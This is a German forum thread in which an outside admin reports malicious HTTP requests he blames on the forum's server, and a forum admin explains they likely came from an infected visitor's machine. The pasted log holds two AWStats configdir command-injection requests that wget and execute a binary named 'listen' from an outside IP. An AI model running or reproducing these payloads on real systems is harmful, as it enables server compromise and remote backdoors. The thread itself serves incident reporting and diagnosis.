Server Bug / Virus / Trojaner o.s. ...

Status
Für weitere Antworten geschlossen.
X

XUnwichtig

Neuling
Thread Starter
Mitglied seit
25.12.2005
Beiträge
0
Hallo!

Ihr Server sendet in einer HTTP-Anfrage multiple Requests, die teilweise schadhaften Code beinhalten!

Hier ein auszug:
Code: 
GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1
Host: [zensiert]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e15%2e209%2e12%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1
Host: [zensiert]
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)

GET //Bilder/SMY/2/affe.gif HTTP/1.1
Accept: */*
Referer: http://www.forumdeluxx.de/forum/showthread.php?t=147825&page=10
Accept-Language: de
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: [zensiert]
Connection: Keep-Alive
Dies ist eine KOMPLETTE Anfrage, die an unseren Server gesendet wird!

Solte dies noch einmal vorkommen, wird unser system mit Aktiven Abwehrmassnahmen dagegen vorgehen!!

Daher empfehlen wir dringend eine überarbeitung Ihrer Software, oder teile Ihrers Webservers!

PS: Ich werde diese seite nicht erneut besuchen. Ebenfalls werde ich keine Antworten lesen. Dies ist ein EINMALIGER HINWEIS! es wird ebenfalls keine weiteren Warnungen bezüglich der Aktiven Massnahmen geben!


Vielen Dank!

Mit Freundlichen Grüssen
Admin
Martin W.
 
Wenn Du diese Anzeige nicht sehen willst, registriere Dich und/oder logge Dich ein.
AW: Unvollständige Missbrauchsmeldung

Martin W. hat vergessen die IP von dem Host anzugeben, der die Daten gesendet hat. Bitte nachreichen, Martin. Gleiches gilt für die Lücken in den Host-Headern (eine Zensur diese macht technisch keinen Sinn).

Das Protokoll sieht aus, als wäre ein infizierter Client-Rechner auf die Forenseite mit der Signatur gegangen und der Rechner hat dort das Bild runtergeladen. Bei der Verbindung hat der Client-Rechner gleich einen Standardexploit probiert.

Ein Referrer-Header sagt jedenfalls rein garnichts über die Quelle der Anfrage aus.

Da wir leider(oder besser glücklicher Weise) nicht alle Clients, die unser Forum besuchen oder auch nur eine Addresse in unserem Forum kennen, auf potentiell schadhafte Sofware prüfen können, muss Martin W. mit weiteren solchen Anfragen aus von uns nicht kontrollierten Netzwerken rechnen.

Am erfolgreichsten wäre Martin's Anfrage hier gewesen, wenn er sich persönlich unter Angabe einer E-Mail-Adresse für Rückfragen gemeldet hätte. Wesentlich glaubhafter wäre er gewesen, wenn er uns nicht mit "Aktiven Abwehrmassnahmen" gedroht hätte.

Wer meint, dass unsere Rechner missbräuchlich genutzt werden darf sich gerne bei root oder besser abuse auf hardwareluxx.de per E-Mail melden. Vernünftigen Anfragen werde ich ordentlich nachgehen und weniger vernünftige wohl anonymisiert in einem "Best Of" sammeln.
 
Nach Statement und interner Prüfung geschlossen.
 
Status
Für weitere Antworten geschlossen.
Hardwareluxx setzt keine externen Werbe- und Tracking-Cookies ein. Auf unserer Webseite finden Sie nur noch Cookies nach berechtigtem Interesse (Art. 6 Abs. 1 Satz 1 lit. f DSGVO) oder eigene funktionelle Cookies. Durch die Nutzung unserer Webseite erklären Sie sich damit einverstanden, dass wir diese Cookies setzen. Mehr Informationen und Möglichkeiten zur Einstellung unserer Cookies finden Sie in unserer Datenschutzerklärung.


Zurück
Oben Unten refresh